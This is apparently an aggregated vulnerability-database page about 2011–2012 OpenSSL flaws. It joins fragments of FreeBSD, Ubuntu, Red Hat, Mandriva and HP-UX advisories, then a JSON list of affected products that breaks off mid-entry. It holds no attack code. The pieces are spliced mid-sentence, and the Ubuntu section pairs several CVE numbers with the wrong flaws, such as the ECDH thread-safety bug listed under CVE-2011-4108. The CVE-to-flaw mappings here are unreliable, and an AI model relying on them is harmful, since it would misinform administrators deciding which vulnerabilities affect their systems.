src/crypto/openssl/ssl/ssl3.h 1.2.2.1.6.1 RELENG_8_2 src/UPDATING 1.632.2.19.2.9 src/sys/conf/newvers.sh 1.83.2.12.2.12 src/crypto/openssl/crypto/pkcs7/pk7_doit.c 1.1.1.13.10.1.2.1 src/crypto/openssl/crypto/mem.c 1.2.8.1 src/crypto/openssl/crypto/x509v3/pcy_map.c 1.2.8.1 src/crypto/openssl/crypto/x509v3/pcy_tree.c 1.2.2.1.4.1 src/crypto/openssl/crypto/asn1/a_d2i_fp.c 1.1.1.3.18.1 src/crypto/openssl/crypto/buffer/buffer.c 1.2.8.1 src/crypto/openssl/ssl/ssl_err.c 1.2.2.1.4.1 src/crypto/openssl/ssl/s3_srvr.c 1.3.2.3.2.1 src/crypto/openssl/ssl/ssl.h 1.2.2.1.4.1 src/crypto/openssl/ssl/s3_enc.c 1.2.2.1.2.1 src/crypto/openssl/ssl/ssl3.h 1.2.2.1.4.1 RELENG_8_1 src/UPDATING 1.632.2.14.2.12 src/sys/conf/newvers.sh 1.83.2.10.2.13 src/crypto/openssl/crypto/pkcs7/pk7_doit.c 1.1.1.13.16.1 src/crypto/openssl/crypto/mem.c 1.2.6.1 src/crypto/openssl/crypto/x509v3/pcy_map.c 1.2.6.1 src/crypto/openssl/crypto/x509v3/pcy_tree.c 1.2.2.1.2.1 src/crypto/openssl/crypto/asn1/a_d2i_fp.c 1.1.1.3.16.1 src/crypto/openssl/crypto/buffer/buffer.c 1.2.6.1 src/crypto/openssl/ssl/ssl_err.c 1.2.2.1.2.1 src/crypto/openssl/ssl/s3_srvr.c 1.3.2.2.2.1 src/crypto/openssl/ssl/ssl.h 1.2.2.1.2.1 src/crypto/openssl/ssl/s3_enc.c 1.2.6.1 src/crypto/openssl/ssl/ssl3.h 1.2.2.1.2.1 RELENG_9 src/crypto/openssl/crypto/pkcs7/pk7_doit.c 1.2.2.1 src/crypto/openssl/crypto/mem.c 1.2.10.1 src/crypto/openssl/crypto/x509v3/pcy_map.c 1.2.10.1 src/crypto/openssl/crypto/x509v3/pcy_tree.c 1.3.2.1 src/crypto/openssl/crypto/asn1/a_d2i_fp.c 1.1.1.3.22.1 src/crypto/openssl/crypto/buffer/buffer.c 1.2.10.1 src/crypto/openssl/ssl/ssl_err.c 1.3.2.1 src/crypto/openssl/ssl/s3_srvr.c 1.7.2.1 src/crypto/openssl/ssl/ssl.h 1.3.2.1 src/crypto/openssl/ssl/s3_enc.c 1.3.2.1 src/crypto/openssl/ssl/ssl3.h 1.3.2.1 RELENG_9_0 src/UPDATING 1.702.2.4.2.3 src/sys/conf/newvers.sh 1.95.2.4.2.5 src/crypto/openssl/crypto/pkcs7/pk7_doit.c 1.2.4.1 src/crypto/openssl/crypto/mem.c 1.2.12.1 src/crypto/openssl/crypto/x509v3/pcy_map.c 1.2.12.1 src/crypto/openssl/crypto/x509v3/pcy_tree.c 1.3.4.1 src/crypto/openssl/crypto/asn1/a_d2i_fp.c 1.1.1.3.24.1 src/crypto/openssl/crypto/buffer/buffer.c 1.2.12.1 src/crypto/openssl/ssl/ssl_err.c 1.3.4.1 src/crypto/openssl/ssl/s3_srvr.c 1.7.4.1 src/crypto/openssl/ssl/ssl.h 1.3.4.1 src/crypto/openssl/ssl/s3_enc.c 1.3.4.1 src/crypto/openssl/ssl/ssl3.h 1.3.4.1
Subversion:
Branch/path Revision
stable/7/ r234954 releng/7.4/ r234954 stable/8/ r234954 releng/8.3/ r234954 releng/8.2/ r234954 releng/8.1/ r234954 stable/9/ r234954 releng/9.0/ r234954
VII. Content-Disposition: inline
==========================================================================Ubuntu Security Notice USN-1357-1 February 09, 2012
openssl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 11.10
- Ubuntu 11.04
- Ubuntu 10.10
- Ubuntu 10.04 LTS
- Ubuntu 8.04 LTS
Summary:
Multiple vulnerabilities exist in OpenSSL that could expose sensitive information or cause applications to crash.
Software Description: - openssl: Secure Socket Layer (SSL) binary and related cryptographic tools
Details:
It was discovered that the elliptic curve cryptography (ECC) subsystem in OpenSSL, when using the Elliptic Curve Digital Signature Algorithm (ECDSA) for the ECDHE_ECDSA cipher suite, did not properly implement curves over binary fields. This could allow an attacker to determine private keys via a timing attack. This issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu 11.04. (CVE-2011-1945)
Adam Langley discovered that the ephemeral Elliptic Curve Diffie-Hellman (ECDH) functionality in OpenSSL did not ensure thread safety while processing handshake messages from clients. This issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu 11.04. This could allow a remote attacker to recover plaintext. (CVE-2011-4108)
Antonio Martin discovered that a flaw existed in the fix to address CVE-2011-4108, the DTLS MAC check failure. This issue only affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu 11.04. (CVE-2011-4109)
It was discovered that OpenSSL, in certain circumstances involving ECDH or ECDHE cipher suites, used an incorrect modular reduction algorithm in its implementation of the P-256 and P-384 NIST elliptic curves. This issue only affected Ubuntu 8.04 LTS. (CVE-2011-4576)
Andrew Chi discovered that OpenSSL, when RFC 3779 support is enabled, could trigger an assert when handling an X.509 certificate containing certificate-extension data associated with IP address blocks or Autonomous System (AS) identifiers. (CVE-2011-4619)
Andrey Kulikov discovered that the GOST block cipher engine in OpenSSL did not properly handle invalid parameters. This could allow a remote attacker to cause a denial of service via crafted data from a TLS client. This issue only affected Ubuntu 11.10. (CVE-2012-0027)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 11.10: libssl1.0.0 1.0.0e-2ubuntu4.2 openssl 1.0.0e-2ubuntu4.2
Ubuntu 11.04: libssl0.9.8 0.9.8o-5ubuntu1.2 openssl 0.9.8o-5ubuntu1.2
Ubuntu 10.10: libssl0.9.8 0.9.8o-1ubuntu4.6 openssl 0.9.8o-1ubuntu4.6
Ubuntu 10.04 LTS: libssl0.9.8 0.9.8k-7ubuntu8.8 openssl 0.9.8k-7ubuntu8.8
Ubuntu 8.04 LTS: libssl0.9.8 0.9.8g-4ubuntu3.15 openssl 0.9.8g-4ubuntu3.15
After a standard system update you need to reboot your computer to make all the necessary changes. Relevant releases/architectures:
RHEL Desktop Workstation (v. 5 server) - i386, ia64, ppc, s390x, x86_64 Red Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64
It was discovered that the Datagram Transport Layer Security (DTLS) protocol implementation in OpenSSL leaked timing information when performing certain operations. For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted. Bugs fixed (http://bugzilla.redhat.com/):
771770 - CVE-2011-4108 openssl: DTLS plaintext recovery attack 771771 - CVE-2011-4109 openssl: double-free in policy checks 771775 - CVE-2011-4576 openssl: uninitialized SSL 3.0 padding 771780 - CVE-2011-4619 openssl: SGC restart DoS attack
- 5 client):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/5Client/en/os/SRPMS/openssl-0.9.8e-20.el5_7.1.src.rpm
i386: openssl-0.9.8e-20.el5_7.1.i386.rpm openssl-0.9.8e-20.el5_7.1.i686.rpm openssl-debuginfo-0.9.8e-20.el5_7.1.i386.rpm openssl-debuginfo-0.9.8e-20.el5_7.1.i686.rpm openssl-perl-0.9.8e-20.el5_7.1.i386.rpm
x86_64: openssl-0.9.8e-20.el5_7.1.i686.rpm openssl-0.9.8e-20.el5_7.1.x86_64.rpm openssl-debuginfo-0.9.8e-20.el5_7.1.i686.rpm openssl-debuginfo-0.9.8e-20.el5_7.1.x86_64.rpm openssl-perl-0.9.8e-20.el5_7.1.x86_64.rpm
RHEL Desktop Workstation (v. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
iD8DBQFPFFiBmqjQ0CJFipgRAkIUAJ9foScZELNgGkHUEaaSx9sgdWNMFwCgnsst eph27yO3eEECVX28+SNUKyw= =wTFq -----END PGP SIGNATURE----- .
Release Date: 2012-01-19 Last Updated: 2012-01-19
Potential Security Impact: Remote Denial of Service (DoS), unauthorized access
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP-UX OpenSSL. This vulnerability could be exploited remotely to create a Denial of Service (DoS) or to gain unauthorized access.
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23, B.11.31 running OpenSSL before vA.00.09.08s.
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2011-3210 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2011-4108 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2011-4109 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 9.3 CVE-2011-4576 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2011-4577 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2011-4619 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided upgrades to resolve this vulnerability. The upgrades are available from the following location ftp://ossl098s:Secure12@ftp.usa.hp.com
HP-UX Release / Depot Name
B.11.11 PA (32 and 64) / OpenSSL_A.00.09.08s.001_HP-UX_B.11.11_32+64.depot
B.11.23 (PA and IA) / OpenSSL_A.00.09.08s.002_HP-UX_B.11.23_IA-PA.depot
B.11.31 (PA and IA) / OpenSSL_A.00.09.08s.003_HP-UX_B.11.31_IA-PA.depot
MANUAL ACTIONS: Yes - Update
Install OpenSSL A.00.09.08s or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11
openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: Install revision A.00.09.08s.001 or subsequent
HP-UX B.11.23
openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: Install revision A.00.09.08s.002 or subsequent
HP-UX B.11.31
openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: Install revision A.00.09.08s.003 or subsequent
END AFFECTED VERSIONS
HISTORY Version:1 (rev.1) 19 January 2012 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201201-0170", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8r" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8k" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8q" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8n" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8p" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "0.9.8j" }, { "model": null, "scope": null, "trust": 0.8, "vendor": "efi", "version": null }, { "model": "project openssl 0.9.8m", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8n", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "project openssl 0.9.8o", "scope": null, "trust": 0.6, "vendor": "openssl", "version": null }, { "model": "informix genero", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.32" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "big-ip wom hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "ip deskphone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16.2" }, { "model": "aura system platform", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "6.2.1.0.9" }, { "model": "hardware management console 7r7.7.0", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "project openssl 0.9.8f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "linux enterprise sdk sp1", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "big-ip apm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "informix genero", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.41" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1.1" }, { "model": "big-ip webaccelerator hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.1" }, { "model": "aura system manager", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "project openssl b", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "11.3" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.10" }, { "model": "enterprise linux es", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "hardware management console 7r7.2.0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "hardware management console 7r7.1.0 sp4", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "8.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "ds8870", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "meeting exchange sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "project openssl k", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "junos space ja1500 appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "sterling connect:enterprise for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip asm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "proactive contact", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.1" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.1" }, { "model": "ip deskphone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16" }, { "model": "aura system platform sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5" }, { "model": "big-ip ltm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.10" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.2" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1" }, { "model": "voice portal", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.1.3" }, { "model": "big-ip psm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "junos space ja2500 appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "xiv storage system gen3 mtm", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2812-11411.2" }, { "model": "linux enterprise server sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "reflection sp1", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "14.0" }, { "model": "aura communication manager sp4", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "linux mandrake x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2010.1" }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.1" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "meeting exchange sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "big-ip ltm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.3" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0.0.52" }, { "model": "tivoli netcool/system service monitor fp11", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip webaccelerator hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "8.2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "xiv storage system gen3 mtm 11.1.0.a", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2810-114" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "tivoli netcool/system service monitor fp12", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.1" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6" }, { "model": "sterling connect:enterprise for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.44" }, { "model": "esx", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.5" }, { "model": "hardware management console 7r7.1.0 sp3", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.40" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.4" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "project openssl 0.9.8r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "junos space 14.1r1", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip ltm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip analytics hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip link controller hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "8.3-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "tivoli network manager fp7", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.8" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "pfsense", "scope": 